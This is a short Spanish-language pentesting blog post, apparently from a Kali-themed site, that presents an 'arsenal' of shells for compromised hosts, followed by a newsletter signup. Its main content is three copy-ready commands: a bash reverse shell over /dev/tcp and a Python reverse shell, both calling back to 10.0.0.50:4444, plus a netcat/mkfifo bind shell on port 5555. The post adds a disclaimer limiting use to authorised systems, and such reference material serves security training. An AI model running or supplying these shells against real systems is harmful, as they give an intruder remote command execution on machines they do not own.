~ / blog / pentesting
KALI

Shells para cada situación

No siempre puedes usar bash para tu shell.

Ten un arsenal. La reverse shell clásica usa el descriptor dev tcp de bash.

Si no hay bash, hay versiones en python, en perl, en php, y hasta en netcat con la opción de ejecutar. La reverse conecta de vuelta a ti, saltando el firewall de entrada; la bind abre un puerto en la víctima para que TÚ te conectes, útil si no controlas tu propia IP.

Guarda este repertorio: siempre hay una que funciona.

# los comandos

www-data@victim:$ bash -i >& /dev/tcp/10.0.0.50/4444 0>&1 # reverse (bash)copiar
www-data@victim:$ python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.50",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/sh")'copiar
www-data@victim:$ rm /tmp/f;mkfifo /tmp/f;nc -lvp 5555 < /tmp/f | sh > /tmp/f 2>&1 # bindcopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.